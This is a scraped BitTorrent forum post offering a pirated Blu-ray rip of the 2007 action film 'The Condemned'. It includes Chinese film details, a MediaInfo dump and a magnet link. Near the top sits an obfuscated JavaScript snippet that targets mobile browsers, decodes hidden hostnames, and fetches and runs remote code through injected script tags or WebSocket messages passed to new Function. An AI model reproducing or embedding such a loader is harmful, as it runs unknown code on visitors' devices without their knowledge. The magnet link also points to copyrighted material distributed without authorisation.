死囚大逃杀[中文字幕].The.Condemned.2007.1080p.BluRay.x265.10bit 6.42GB

版主小s 21天前 286

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 死囚大逃杀 / 罪人求生 / 死刑犯
◎片  名 The Condemned
◎年  代 2007
◎产  地 美国
◎类  别 动作 / 惊悚 / 犯罪
◎语  言 英语
◎上映日期 2007-04-27
◎IMDb链接 https://www.imdb.com/title/tt0443473/
◎豆瓣评分 6.2/10 (9520人评价)
◎豆瓣链接 https://movie.douban.com/subject/1996313/
◎片  长 USA: 113 分钟
◎导  演 斯科特·维普 Scott Wiper (id:1009809)
◎编  剧 斯科特·维普 Scott Wiper (id:1009809)
◎演  员 史蒂夫·奥斯汀 Steve Austin (id:1036340)
       维尼·琼斯 Vinnie Jones (id:1013804)
       山口英胜 Masa Yamaguchi (id:1357367)
       沙利文·斯特普尔顿 Sullivan Stapleton (id:1314108)
       安琪·米利肯 Angie Milliken (id:1292119)
       埃默利雅波恩 Emelia Burns (id:1249544)
       乔伊梅西 Joey Massey (id:1193900)
       史蒂夫·莫里斯 Steve Morris (id:1419977)
       布拉德·麦克默里 Brad McMurray (id:1185684)
       特伦特·沙立文 Trent Sullivan (id:1159706)
       内森·琼斯 Nathan Jones (id:1022750)
       迈德琳·怀斯特 Madeleine West (id:1022786)
       马努·贝内特 Manu Bennett (id:1064898)
       里克·霍夫曼 Rick Hoffman (id:1099038)
       Annie Jones Annie Jones (id:1106229)
       尼尔·皮戈特 Neil Pigot (id:1129399)
       约翰·奥尔斯克 John Orcsik (id:1137409)
       James Stewart James Stewart (id:1149777)
       拉尼·约翰·图普 Lani John Tupu (id:1150848)
       托莉·莫塞特 Tory Mussett (id:1435052)
       朱利安·帕里 Julian Parry (id:1294018)
       文斯·麦马汉 Vince McMahon (id:1050035)
       格里莫·瑞维尔 Graeme Revell (id:1028103)
       Derek Brechin Derek Brechin (id:1015378)
       汤姆·麦克维尼 Tom McSweeney (id:1125915)
       格雷厄姆·格雷斯·沃克 Graham 'Grace' Walker (id:1300300)
       Kelly Johanson Kelly Johanson (id:1180531)
       Mark Wareham Mark Wareham (id:1300437)
       朱利安·帕里 Julian Parry (id:1294018)
       戴夫·莫利 Dave Morley (id:1305668)
       萨曼莎·斯特劳斯 Samantha Strauss (id:1373634)

◎标  签 暴力 / 动作 / 美国 / 人性 / 美国电影 / 犯罪 / 死刑犯 / 2007

◎简  介
  杰克?康拉德(Stone Cold Steve Austin “响尾蛇”史蒂夫?奥斯汀 饰)原本是美国中部一座监狱里的死刑犯,在即将走上电椅的那一刻,他却被腐败的监狱长卖给一家电视台。该电视台制片人策划了一个新节目,他从世界各地遴选10位肌肉发达、动作敏捷且暴虐十足的死囚犯,将他们置身于海上孤岛中相互残杀,只有干掉其他对手坚持30个小时的人才有一线生机。整个搏斗过程通过摄像机全方位多角度传送到世界各地,嗜血如命的观众纷纷购买这个疯狂的真人秀。                                       
                                    死囚中藏龙卧虎,杰克若想活命只有奋力搏杀……                                       
                                    [背景] *光头佬男主角是WWE著名摔角手Stone Cold Steve Austin,他的地位成就与更早前从影的The Rock不相上下。如果从WWE专门为之定做重量级冠军腰带这件事来看,SCSA的成就实际要高于后者的。                                       
                                    *WWE自成立电影部门以来,先后重点推出...

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 202951836629244444527914082148850473598 (0x98AF1A18F42C6B467A4505C5421E1A7E)

  4. Complete name                            : The.Condemned.2007.1080p.BluRay.x265.10bit-MNHD.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 6.42 GiB

  8. Duration                                 : 1 h 53 min

  9. Overall bit rate                         : 8 089 kb/s

  10. Movie name                               : The Condemned 2007 1080p BluRay x265 10bit MNHD

  11. Encoded date                             : UTC 2021-08-29 14:10:22

  12. Writing application                      : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  13. Writing library                          : libebml v1.4.1 + libmatroska v1.6.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 53 min

  21. Bit rate                                 : 7 424 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 1 036 pixels

  24. Display aspect ratio                     : 1.85:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (23976/1000/53354) FPS

  27. Original frame rate                      : 23.976 (24000/1001/53354) FPS

  28. Color space                              : YUV

  29. Chroma subsampling                       : 4:2:0

  30. Bit depth                                : 10 bits

  31. Bits/(Pixel*Frame)                       : 0.156

  32. Stream size                              : 5.89 GiB (92%)

  33. Writing library                          : x265 3.5+1-f0c1022b6:[Linux][GCC 9.3.0][64 bit] 10bit

  34. Encoding settings                        : cpuid=533541111039 / frame-threads=3 / numa-pools=11 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / total-frames=163465 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=23.9 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  35. Default                                  : Yes

  36. Forced                                   : No

  37. Color range                              : Limited

  38. Color primaries                          : BT.709

  39. Transfer characteristics                 : BT.709

  40. Matrix coefficients                      : BT.709


  41. Audio

  42. ID                                       : 2

  43. Format                                   : AC-3

  44. Format/Info                              : Audio Coding 3

  45. Commercial name                          : Dolby Digital

  46. Codec ID                                 : A_AC3

  47. Duration                                 : 1 h 53 min

  48. Bit rate mode                            : Constant

  49. Bit rate                                 : 640 kb/s

  50. Channel(s)                               : 6 channels

  51. Channel layout                           : L R C LFE Ls Rs

  52. Sampling rate                            : 48.0 kHz

  53. Frame rate                               : 31.250 FPS (1536 SPF)

  54. Compression mode                         : Lossy

  55. Stream size                              : 520 MiB (8%)

  56. Language                                 : English

  57. Service kind                             : Complete Main

  58. Default                                  : Yes

  59. Forced                                   : No


  60. Text #1

  61. ID                                       : 3

  62. Format                                   : PGS

  63. Muxing mode                              : zlib

  64. Codec ID                                 : S_HDMV/PGS

  65. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration                                 : 1 h 43 min

  67. Bit rate                                 : 21.1 kb/s

  68. Count of elements                        : 1911

  69. Stream size                              : 15.6 MiB (0%)

  70. Title                                    : CHS

  71. Language                                 : Chinese

  72. Default                                  : Yes

  73. Forced                                   : No


  74. Text #2

  75. ID                                       : 4

  76. Format                                   : PGS

  77. Muxing mode                              : zlib

  78. Codec ID                                 : S_HDMV/PGS

  79. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration                                 : 1 h 43 min

  81. Bit rate                                 : 21.9 kb/s

  82. Count of elements                        : 1911

  83. Stream size                              : 16.2 MiB (0%)

  84. Title                                    : CHT

  85. Language                                 : Chinese

  86. Default                                  : No

  87. Forced                                   : No


  88. Text #3

  89. ID                                       : 5

  90. Format                                   : UTF-8

  91. Codec ID                                 : S_TEXT/UTF8

  92. Codec ID/Info                            : UTF-8 Plain Text

  93. Duration                                 : 1 h 45 min

  94. Bit rate                                 : 40 b/s

  95. Count of elements                        : 973

  96. Stream size                              : 31.0 KiB (0%)

  97. Title                                    : ENG

  98. Language                                 : English

  99. Default                                  : No

  100. Forced                                   : No


  101. Menu

  102. 00:00:00.000                             : en:Chapter 01

  103. 00:07:42.337                             : en:Chapter 02

  104. 00:17:24.710                             : en:Chapter 03

  105. 00:25:09.133                             : en:Chapter 04

  106. 00:36:53.086                             : en:Chapter 05

  107. 00:49:46.775                             : en:Chapter 06

  108. 00:58:26.086                             : en:Chapter 07

  109. 01:08:13.006                             : en:Chapter 08

  110. 01:18:37.755                             : en:Chapter 09

  111. 01:27:41.756                             : en:Chapter 10

  112. 01:37:06.195                             : en:Chapter 11

  113. 01:46:35.848                             : en:Chapter 12



TAGS 动作 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:0609303656E02073967E7BDBFB7DA3CEDDC88DF4
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回